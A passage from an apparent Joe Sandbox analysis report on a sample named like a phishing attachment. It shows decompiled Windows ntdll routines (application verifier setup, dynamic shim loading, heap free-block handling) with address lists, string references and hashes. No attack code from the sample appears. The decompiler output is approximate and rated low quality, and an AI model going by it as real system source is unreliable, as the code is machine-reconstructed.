					_t128 = 0xc0000001;
					 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) & 0xfffffeff;
					goto L49;
				}
			}


































                                                                                                                                                                                  0x333d8633
                                                                                                                                                                                  0x333d8633
                                                                                                                                                                                  0x333d8642
                                                                                                                                                                                  0x333d8644
                                                                                                                                                                                  0x333d8648
                                                                                                                                                                                  0x333d864d
                                                                                                                                                                                  0x333d8654
                                                                                                                                                                                  0x333d8658
                                                                                                                                                                                  0x333d865c
                                                                                                                                                                                  0x333d8661
                                                                                                                                                                                  0x333d8663
                                                                                                                                                                                  0x333d8861
                                                                                                                                                                                  0x333d8864
                                                                                                                                                                                  0x333d8866
                                                                                                                                                                                  0x333d8872
                                                                                                                                                                                  0x333d8877
                                                                                                                                                                                  0x333d887e
                                                                                                                                                                                  0x333d8886
                                                                                                                                                                                  0x333d888b
                                                                                                                                                                                  0x333d888f
                                                                                                                                                                                  0x333d8891
                                                                                                                                                                                  0x333d8893
                                                                                                                                                                                  0x333d8893
                                                                                                                                                                                  0x333d8880
                                                                                                                                                                                  0x333d8880
                                                                                                                                                                                  0x333d8880
                                                                                                                                                                                  0x333d889b
                                                                                                                                                                                  0x333d88a2
                                                                                                                                                                                  0x333d88ac
                                                                                                                                                                                  0x333d88ac
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d88a4
                                                                                                                                                                                  0x333d88a4
                                                                                                                                                                                  0x333d88a6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d88a8
                                                                                                                                                                                  0x333d88b1
                                                                                                                                                                                  0x333d88b1
                                                                                                                                                                                  0x333d88b6
                                                                                                                                                                                  0x333d88bb
                                                                                                                                                                                  0x333d88c2
                                                                                                                                                                                  0x333d88c4
                                                                                                                                                                                  0x333d88ef
                                                                                                                                                                                  0x333d88ef
                                                                                                                                                                                  0x333d88f4
                                                                                                                                                                                  0x333d88f6
                                                                                                                                                                                  0x333d88f6
                                                                                                                                                                                  0x333d88fc
                                                                                                                                                                                  0x333d88fc
                                                                                                                                                                                  0x333d88fe
                                                                                                                                                                                  0x333d8900
                                                                                                                                                                                  0x333d8902
                                                                                                                                                                                  0x333d8915
                                                                                                                                                                                  0x333d8915
                                                                                                                                                                                  0x333d892b
                                                                                                                                                                                  0x333d8943
                                                                                                                                                                                  0x333d8943
                                                                                                                                                                                  0x333d8948
                                                                                                                                                                                  0x333d895f
                                                                                                                                                                                  0x333d8961
                                                                                                                                                                                  0x333d8963
                                                                                                                                                                                  0x333d8965
                                                                                                                                                                                  0x333d8970
                                                                                                                                                                                  0x333d8972
                                                                                                                                                                                  0x333d8974
                                                                                                                                                                                  0x333d8978
                                                                                                                                                                                  0x333d8982
                                                                                                                                                                                  0x333d8987
                                                                                                                                                                                  0x333d8987
                                                                                                                                                                                  0x333d8974
                                                                                                                                                                                  0x333d898c
                                                                                                                                                                                  0x333d8994
                                                                                                                                                                                  0x333d8994
                                                                                                                                                                                  0x333d88d6
                                                                                                                                                                                  0x333d88db
                                                                                                                                                                                  0x333d88df
                                                                                                                                                                                  0x333d88e1
                                                                                                                                                                                  0x333d88ea
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d88ea
                                                                                                                                                                                  0x333d88e3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d88e3
                                                                                                                                                                                  0x333d88a2
                                                                                                                                                                                  0x333d8868
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d8868
                                                                                                                                                                                  0x333d866c
                                                                                                                                                                                  0x333d885a
                                                                                                                                                                                  0x333d885a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d885a
                                                                                                                                                                                  0x333d867e
                                                                                                                                                                                  0x333d8684
                                                                                                                                                                                  0x333d868f
                                                                                                                                                                                  0x333d8693
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d86a0
                                                                                                                                                                                  0x333d883f
                                                                                                                                                                                  0x333d8850
                                                                                                                                                                                  0x333d8852
                                                                                                                                                                                  0x333d8854
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d8854
                                                                                                                                                                                  0x333d86a6
                                                                                                                                                                                  0x333d86b2
                                                                                                                                                                                  0x333d86b5
                                                                                                                                                                                  0x333d86ba
                                                                                                                                                                                  0x333d86c5
                                                                                                                                                                                  0x333d86d4
                                                                                                                                                                                  0x333d8719
                                                                                                                                                                                  0x333d872e
                                                                                                                                                                                  0x333d872e
                                                                                                                                                                                  0x333d8730
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d8723
                                                                                                                                                                                  0x333d8728
                                                                                                                                                                                  0x333d872a
                                                                                                                                                                                  0x333d875e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d872c
                                                                                                                                                                                  0x333d872c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d872c
                                                                                                                                                                                  0x333d872a
                                                                                                                                                                                  0x333d8732
                                                                                                                                                                                  0x333d8740
                                                                                                                                                                                  0x333d874a
                                                                                                                                                                                  0x333d874c
                                                                                                                                                                                  0x333d874e
                                                                                                                                                                                  0x333d8768
                                                                                                                                                                                  0x333d876e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d8774
                                                                                                                                                                                  0x333d877a
                                                                                                                                                                                  0x333d878e
                                                                                                                                                                                  0x333d8797
                                                                                                                                                                                  0x333d879c
                                                                                                                                                                                  0x333d879e
                                                                                                                                                                                  0x333d87a0
                                                                                                                                                                                  0x333d87ab
                                                                                                                                                                                  0x333d87ab
                                                                                                                                                                                  0x333d87ae
                                                                                                                                                                                  0x333d87b0
                                                                                                                                                                                  0x333d87b5
                                                                                                                                                                                  0x333d87b5
                                                                                                                                                                                  0x333d87bc
                                                                                                                                                                                  0x333d87c2
                                                                                                                                                                                  0x333d87cd
                                                                                                                                                                                  0x333d87d2
                                                                                                                                                                                  0x333d87d8
                                                                                                                                                                                  0x333d87d8
                                                                                                                                                                                  0x333d87da
                                                                                                                                                                                  0x333d87da
                                                                                                                                                                                  0x333d87e0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d87ec
                                                                                                                                                                                  0x333d87f8
                                                                                                                                                                                  0x333d87fa
                                                                                                                                                                                  0x333d87fc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d8802
                                                                                                                                                                                  0x333d8802
                                                                                                                                                                                  0x333d8806
                                                                                                                                                                                  0x333d880d
                                                                                                                                                                                  0x333d880f
                                                                                                                                                                                  0x333d881a
                                                                                                                                                                                  0x333d881a
                                                                                                                                                                                  0x333d881f
                                                                                                                                                                                  0x333d8834
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d8834
                                                                                                                                                                                  0x333d8750
                                                                                                                                                                                  0x333d8754
                                                                                                                                                                                  0x333d8757
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d86d6
                                                                                                                                                                                  0x333d86dc
                                                                                                                                                                                  0x333d86df
                                                                                                                                                                                  0x333d86e4
                                                                                                                                                                                  0x333d86ef
                                                                                                                                                                                  0x333d86fd
                                                                                                                                                                                  0x333d8711
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d8711

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 333D86BD
                                                                                                                                                                                  • HandleTraces, xrefs: 333D890F
                                                                                                                                                                                  • VerifierDlls, xrefs: 333D893D
                                                                                                                                                                                  • VerifierDebug, xrefs: 333D8925
                                                                                                                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 333D880F
                                                                                                                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 333D86E7
                                                                                                                                                                                  • VerifierFlags, xrefs: 333D88D0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                  • API String ID: 0-3223716464
                                                                                                                                                                                  • Opcode ID: 55d4929fe9ae4b59c650d3ac052aeef74f1acf30e8cab57b3da3cba9a77cbe1e
                                                                                                                                                                                  • Instruction ID: 509023616224014cbb703f75cc64ff46e27ee0d9744ce186bac84b92d20b18df
                                                                                                                                                                                  • Opcode Fuzzy Hash: 55d4929fe9ae4b59c650d3ac052aeef74f1acf30e8cab57b3da3cba9a77cbe1e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D91FE73D46311AFE711DF24C880B1AB7E8EB41715F45C9A9F981BF661CB30E8098B96
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3337237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 35%
                                                                                                                                                                                  			E3337237A(intOrPtr* __ecx, void* __edx) {
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				void* __ebx;
				intOrPtr _t22;
				intOrPtr _t29;
				signed int _t30;
				signed char _t36;
				intOrPtr _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t48;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t53;
				signed int _t55;
				void* _t59;

				_t38 =  *0x334438b8;
				_t50 = 0;
				_v16 = __ecx;
				_v12 = 0;
				_t55 = 0;
				if(_t38 == 0) {
					L2:
					if(_t38 == 1) {
						_t22 =  *0x334468d8; // 0x0
						if(_t22 != 0) {
							E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50, _t22);
							 *0x334468d8 = _t50;
							 *0x33445d4c = _t50;
						}
					}
					 *0x334438b8 = _t38;
					return _t55;
				}
				_t59 =  *0x334468d8 - _t55; // 0x0
				if(_t59 != 0) {
					 *0x334438b8 = 0;
					_t55 = E333D1BB6(_t38,  &_v8);
					if(_t55 >= 0) {
						_t51 =  *0x334468d8; // 0x0
						while( *_t51 != 0) {
							 *0x334491e0(_t51, 0, "true", "true", 0, "true", 0x10);
							_v8();
							if(0 == 0) {
								_t55 = 0xc0000142;
								L21:
								_t50 = 0;
								goto L2;
							}
							_t42 = _t51;
							_t10 = _t42 + 2; // 0x2
							_t48 = _t10;
							do {
								_t29 =  *_t42;
								_t42 = _t42 + 2;
							} while (_t29 != _v12);
							_t51 = _t51 + (_t42 - _t48 >> 1) * 2 + 2;
						}
						_t30 =  *0x7ffe0330;
						_t53 =  *0x33449218; // 0x0
						_v12 = _t30;
						_t45 = 0x20;
						_t46 = _t45 - (_t30 & 0x0000001f);
						asm("ror edi, cl");
						E3335FED0(0x334432d8);
						if( *0x334465f4 < 3) {
							_t46 = _v16;
							if(( *( *_v16 - 0x20) & 0x00000800) == 0) {
								E33346704(_t46, _t53 ^ _v12);
							}
						}
						_push(0x334432d8);
						E3335E740(_t46);
						goto L21;
					}
					_t36 =  *0x334437c0; // 0x0
					if((_t36 & 0x00000003) != 0) {
						E333CE692("minkernel\\ntdll\\ldrinit.c", 0xba1, "LdrpDynamicShimModule", 0, "Getting ApphelpCheckModule failed with status 0x%08lx\n", _t55);
						_t36 =  *0x334437c0; // 0x0
					}
					if((_t36 & 0x00000010) != 0) {
						asm("int3");
					}
					_t55 = _t50;
				}
				goto L2;
			}




















                                                                                                                                                                                  0x33372383
                                                                                                                                                                                  0x3337238b
                                                                                                                                                                                  0x3337238d
                                                                                                                                                                                  0x33372390
                                                                                                                                                                                  0x33372393
                                                                                                                                                                                  0x33372397
                                                                                                                                                                                  0x333723a5
                                                                                                                                                                                  0x333723a8
                                                                                                                                                                                  0x333723aa
                                                                                                                                                                                  0x333723b1
                                                                                                                                                                                  0x333ba878
                                                                                                                                                                                  0x333ba87d
                                                                                                                                                                                  0x333ba883
                                                                                                                                                                                  0x333ba883
                                                                                                                                                                                  0x333723b1
                                                                                                                                                                                  0x333723ba
                                                                                                                                                                                  0x333723c3
                                                                                                                                                                                  0x333723c3
                                                                                                                                                                                  0x33372399
                                                                                                                                                                                  0x3337239f
                                                                                                                                                                                  0x333ba784
                                                                                                                                                                                  0x333ba78f
                                                                                                                                                                                  0x333ba793
                                                                                                                                                                                  0x333ba7cd
                                                                                                                                                                                  0x333ba80b
                                                                                                                                                                                  0x333ba7e3
                                                                                                                                                                                  0x333ba7e9
                                                                                                                                                                                  0x333ba7ee
                                                                                                                                                                                  0x333ba866
                                                                                                                                                                                  0x333ba85f
                                                                                                                                                                                  0x333ba85f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ba85f
                                                                                                                                                                                  0x333ba7f0
                                                                                                                                                                                  0x333ba7f2
                                                                                                                                                                                  0x333ba7f2
                                                                                                                                                                                  0x333ba7f5
                                                                                                                                                                                  0x333ba7f5
                                                                                                                                                                                  0x333ba7f8
                                                                                                                                                                                  0x333ba7fb
                                                                                                                                                                                  0x333ba808
                                                                                                                                                                                  0x333ba808
                                                                                                                                                                                  0x333ba812
                                                                                                                                                                                  0x333ba817
                                                                                                                                                                                  0x333ba81f
                                                                                                                                                                                  0x333ba825
                                                                                                                                                                                  0x333ba826
                                                                                                                                                                                  0x333ba82d
                                                                                                                                                                                  0x333ba82f
                                                                                                                                                                                  0x333ba83b
                                                                                                                                                                                  0x333ba83d
                                                                                                                                                                                  0x333ba849
                                                                                                                                                                                  0x333ba850
                                                                                                                                                                                  0x333ba850
                                                                                                                                                                                  0x333ba849
                                                                                                                                                                                  0x333ba855
                                                                                                                                                                                  0x333ba85a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ba85a
                                                                                                                                                                                  0x333ba795
                                                                                                                                                                                  0x333ba79c
                                                                                                                                                                                  0x333ba7b4
                                                                                                                                                                                  0x333ba7b9
                                                                                                                                                                                  0x333ba7be
                                                                                                                                                                                  0x333ba7c3
                                                                                                                                                                                  0x333ba7c5
                                                                                                                                                                                  0x333ba7c5
                                                                                                                                                                                  0x333ba7c6
                                                                                                                                                                                  0x333ba7c6
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 333BA79F
                                                                                                                                                                                  • DG23, xrefs: 33372382
                                                                                                                                                                                  • LdrpDynamicShimModule, xrefs: 333BA7A5
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 333BA7AF
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: DG23$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-2191466973
                                                                                                                                                                                  • Opcode ID: 395a536944f8d3884b7c6eaf8417edb3af1df5a98e399e173d5acc7d21881712
                                                                                                                                                                                  • Instruction ID: 5c05358828df565644e794bf9516bfa1f0381b06af4458844601cdcb228ed7e2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 395a536944f8d3884b7c6eaf8417edb3af1df5a98e399e173d5acc7d21881712
                                                                                                                                                                                  • Instruction Fuzzy Hash: EE31E376E45704AFFB10EF59C8C1A5A7BF9EB80B50F18C069F810B7A51EB749942CB50
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3334F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMONCrypto
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                                                  			E3334F113(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				void* _v56;
				intOrPtr _v60;
				void* _v68;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t242;
				signed char _t243;
				signed short _t245;
				signed int _t247;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				intOrPtr _t255;
				signed int _t265;
				signed int _t274;
				signed int _t277;
				intOrPtr _t278;
				signed int _t279;
				signed int _t302;
				signed short _t308;
				intOrPtr _t312;
				signed int _t323;
				signed int _t328;
				signed int _t331;
				intOrPtr _t332;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t340;
				intOrPtr _t341;
				intOrPtr _t350;
				signed int _t354;
				signed int _t357;
				intOrPtr _t358;
				signed int _t359;
				signed int _t378;
				signed short _t386;
				intOrPtr _t388;
				intOrPtr _t399;
				unsigned int _t415;
				signed int _t424;
				signed int _t427;
				signed int _t431;
				signed int _t439;
				signed short _t440;
				signed short _t443;
				signed int _t447;
				signed short* _t453;
				void* _t461;
				signed int _t472;
				signed int _t473;
				signed int _t475;
				intOrPtr _t476;
				signed int _t483;
				void* _t485;
				signed short _t496;
				unsigned int _t502;
				unsigned int _t504;
				signed int _t509;
				signed int _t514;
				signed short* _t524;
				signed int _t535;
				signed int _t537;
				signed int _t540;
				unsigned int _t545;
				signed int _t547;

				_t444 = __ecx;
				_t547 = __ecx;
				_t533 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x33446d48) != 0) {
					_push(_a4);
					_t509 = __edx;
					L11:
					_t242 = E33360B10(_t444, _t509);
					L7:
					return _t242;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x240)) =  *((intOrPtr*)(__ecx + 0x240)) - 1;
						_t424 = E3334F858(__edx,  &_v12,  &_v16);
						__eflags = _t424;
						if(_t424 != 0) {
							_t135 = _t547 + 0x244;
							 *_t135 =  *(_t547 + 0x244) - _v16;
							__eflags =  *_t135;
						}
					}
					_t439 = _a4;
					_t509 = _t533;
					_v44 = _t533;
					L14:
					_t243 =  *((intOrPtr*)(_t533 + 6));
					__eflags = _t243;
					if(_t243 == 0) {
						_t535 = _t547;
					} else {
						_t535 = (_t533 & 0xffff0000) - ((_t243 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t535;
					}
					_t245 = 7 + _t439 * 8 + _t509;
					_v12 = _t245;
					__eflags =  *_t245 - 3;
					if( *_t245 == 3) {
						_v16 = _t509 + _t439 * 8 + 8;
						E33349E69(_t547, _t509 + _t439 * 8 + 8);
						_t496 = _v16;
						_v28 =  *(_t496 + 0x10);
						 *((intOrPtr*)(_t535 + 0x30)) =  *((intOrPtr*)(_t535 + 0x30)) - 1;
						_v36 =  *(_t496 + 0x14);
						 *((intOrPtr*)(_t535 + 0x2c)) =  *((intOrPtr*)(_t535 + 0x2c)) - ( *(_t496 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t547 + 0x1f8)) =  *((intOrPtr*)(_t547 + 0x1f8)) +  *(_t496 + 0x14);
						 *((intOrPtr*)(_t547 + 0x208)) =  *((intOrPtr*)(_t547 + 0x208)) - 1;
						_t415 =  *(_t496 + 0x14);
						__eflags = _t415 - 0x7f000;
						if(_t415 >= 0x7f000) {
							 *(_t547 + 0x1fc) =  *(_t547 + 0x1fc) - _t415;
							_t415 =  *(_t496 + 0x14);
						}
						_t509 = _v44;
						_t439 = _t439 + (_t415 >> 3) + 0x20;
						__eflags = 1;
						_a4 = _t439;
						_v40 = 1;
					} else {
						_v36 = _v36 & 0x00000000;
					}
					__eflags =  *((intOrPtr*)(_t547 + 0x54)) -  *((intOrPtr*)(_t509 + 4));
					if( *((intOrPtr*)(_t547 + 0x54)) ==  *((intOrPtr*)(_t509 + 4))) {
						_v48 = _t509;
						_t247 = E3334BF92(_t535, _t509);
						__eflags = _a8;
						_v32 = _t247;
						if(_a8 != 0) {
							__eflags = _t247;
							if(_t247 == 0) {
								goto L20;
							}
						}
						__eflags =  *0x33446960 - 1;
						if( *0x33446960 >= 1) {
							__eflags = _t247;
							if(_t247 == 0) {
								_t399 =  *[fs:0x30];
								__eflags =  *(_t399 + 0xc);
								if( *(_t399 + 0xc) == 0) {
									_push("HEAP: ");
									E3334B910();
								} else {
									E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E3334B910();
								__eflags =  *0x33445da8;
								if( *0x33445da8 == 0) {
									__eflags = 0;
									L3340FC95(_t439, 1, _t535, 0);
								}
								_t509 = _v44;
								_t439 = _a4;
							}
						}
						_t334 = _v40;
						_t472 = _t439 << 3;
						_v20 = _t472;
						_t473 = _t472 + _t509;
						_v24 = _t473;
						__eflags = _t334;
						if(_t334 == 0) {
							_t473 = _t473 + 0xfffffff0;
						}
						_t475 = (_t473 & 0xfffff000) - _v48;
						__eflags = _t475;
						_v52 = _t475;
						if(_t475 == 0) {
							__eflags =  *0x33446960 - 1;
							if( *0x33446960 < 1) {
								goto L9;
							}
							__eflags = _t334;
							L147:
							if(__eflags == 0) {
								goto L9;
							}
							_t255 =  *[fs:0x30];
							__eflags =  *(_t255 + 0xc);
							if( *(_t255 + 0xc) == 0) {
								_push("HEAP: ");
								E3334B910();
							} else {
								E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E3334B910();
							__eflags =  *0x33445da8;
							if( *0x33445da8 == 0) {
								__eflags = 0;
								L3340FC95(_t439, 1, _t535, 0);
							}
							goto L153;
						} else {
							_t336 = E3334FABA( &_v48,  &_v52, 0x4000);
							__eflags = _t336;
							if(_t336 < 0) {
								L90:
								 *((intOrPtr*)(_t547 + 0x220)) =  *((intOrPtr*)(_t547 + 0x220)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									L154:
									_t509 = _v44;
									L9:
									_t444 = _t547;
									L10:
									_push(_t439);
									goto L11;
								}
								E3336096B(_t547, _t535, _v28 + 0xffffffe8, _v36, _v44,  &_a4);
								L153:
								_t439 = _a4;
								goto L154;
							}
							_t337 = L33363C40();
							_t441 = 0x7ffe0380;
							__eflags = _t337;
							if(_t337 != 0) {
								_t340 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t340 = 0x7ffe0380;
							}
							__eflags =  *_t340;
							if( *_t340 != 0) {
								_t341 =  *[fs:0x30];
								__eflags =  *(_t341 + 0x240) & 0x00000001;
								if(( *(_t341 + 0x240) & 0x00000001) != 0) {
									E3340F13E(_t441, _t547, _v48, _v52, 5);
								}
							}
							_t342 = _v32;
							 *((intOrPtr*)(_t547 + 0x210)) =  *((intOrPtr*)(_t547 + 0x210)) + 1;
							_t476 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t476 - 0x7f000;
							if(_t476 >= 0x7f000) {
								 *(_t547 + 0x1fc) =  *(_t547 + 0x1fc) - _t476;
							}
							E33349E69(_t547, _t342);
							_t478 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E3334B9F6(_t547, _t478);
							 *((intOrPtr*)(_t535 + 0x2c)) =  *((intOrPtr*)(_t535 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t547 + 0x1f8)) =  *((intOrPtr*)(_t547 + 0x1f8)) - _v52;
							_t350 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t350 - 0x7f000;
							if(_t350 >= 0x7f000) {
								_t123 = _t547 + 0x1fc;
								 *_t123 =  *(_t547 + 0x1fc) + _t350;
								__eflags =  *_t123;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t524 = _v52 + _v48;
								_v32 = _t524;
								_t524[2] =  *((intOrPtr*)(_t547 + 0x54));
								__eflags = _v24 - _v52 + _v48;
								if(_v24 == _v52 + _v48) {
									__eflags =  *(_t547 + 0x4c);
									if( *(_t547 + 0x4c) != 0) {
										_t524[1] = _t524[1] ^ _t524[0] ^  *_t524;
										 *_t524 =  *_t524 ^  *(_t547 + 0x50);
									}
								} else {
									_t443 = 0;
									_t524[3] = 0;
									_t524[1] = 0;
									_t378 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t483 = _t378;
									 *_t524 = _t378;
									__eflags =  *0x33446960 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t483 - 1;
										if(_t483 <= 1) {
											_t388 =  *[fs:0x30];
											__eflags =  *(_t388 + 0xc);
											if( *(_t388 + 0xc) == 0) {
												_push("HEAP: ");
												E3334B910();
											} else {
												E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E3334B910();
											__eflags =  *0x33445da8 - _t443; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												L3340FC95(_t443, 1, _t535, 0);
											}
											_t524 = _v32;
										}
									}
									_t524[1] = _t443;
									__eflags =  *((intOrPtr*)(_t535 + 0x18)) - _t535;
									if( *((intOrPtr*)(_t535 + 0x18)) != _t535) {
										_t386 = (_t524 - _t535 >> 0x10) + 1;
										_v16 = _t386;
										__eflags = _t386 - 0xfe;
										if(_t386 >= 0xfe) {
											_push(_t443);
											_push(_t443);
											_push(_t535);
											_push(_t524);
											_t485 = 3;
											E33415FED(_t485,  *((intOrPtr*)(_t535 + 0x18)));
											_t524 = _v48;
											_t386 = _v32;
										}
										_t443 = _t386;
									}
									_t524[3] = _t443;
									E33360B10(_t547, _t524,  *_t524 & 0x0000ffff);
									_t441 = 0x7ffe0380;
								}
							}
							_t354 = L33363C40();
							__eflags = _t354;
							if(_t354 != 0) {
								_t357 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t357 = _t441;
							}
							__eflags =  *_t357;
							if( *_t357 != 0) {
								_t358 =  *[fs:0x30];
								__eflags =  *(_t358 + 0x240) & 1;
								if(( *(_t358 + 0x240) & 1) != 0) {
									__eflags = L33363C40();
									if(__eflags != 0) {
										_t441 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E3340F058(_t441, _t547, _v48, __eflags, _v52,  *(_t547 + 0x74) << 3, _v40, _v36,  *_t441 & 0x000000ff);
								}
							}
							_t359 = L33363C40();
							_t540 = 0x7ffe038a;
							_t440 = 0x230;
							__eflags = _t359;
							if(_t359 != 0) {
								_t242 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t242 = 0x7ffe038a;
							}
							__eflags =  *_t242;
							if( *_t242 != 0) {
								__eflags = L33363C40();
								if(__eflags != 0) {
									_t540 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t440;
									__eflags = _t540;
								}
								_push( *_t540 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								L123:
								_push( *(_t547 + 0x74) << 3);
								_push(_v52);
								_t242 = E3340F058(_t440, _t547, _v48, __eflags);
							}
							goto L7;
						}
					}
					L20:
					_t447 = _t509 + 0x0000101f & 0xfffff000;
					_v48 = _t447;
					__eflags = _t447 - _t509 + 0x28;
					if(_t447 == _t509 + 0x28) {
						_t447 = _t447 + 0x1000;
						_v48 = _t447;
					}
					_t250 = _t439 << 3;
					_v24 = _t250;
					_t251 = _t250 + _t509;
					__eflags = _v40;
					_v20 = _t251;
					if(_v40 == 0) {
						_t251 = _t251 + 0xfffffff0;
					}
					_t252 = _t251 & 0xfffff000;
					__eflags = _t252 - _t447;
					if(_t252 < _t447) {
						__eflags =  *0x33446960 - 1; // 0x0
						if(__eflags < 0) {
							goto L9;
						}
						__eflags = _v40;
						goto L147;
					}
					_t265 = _t252 - _t447;
					__eflags = _a8;
					_v52 = _t265;
					if(_a8 != 0) {
						L25:
						__eflags = _t265;
						if(_t265 == 0) {
							L31:
							_t440 = 0;
							__eflags = _v40;
							if(_v40 == 0) {
								_t453 = _v48 + _v52;
								_v36 = _t453;
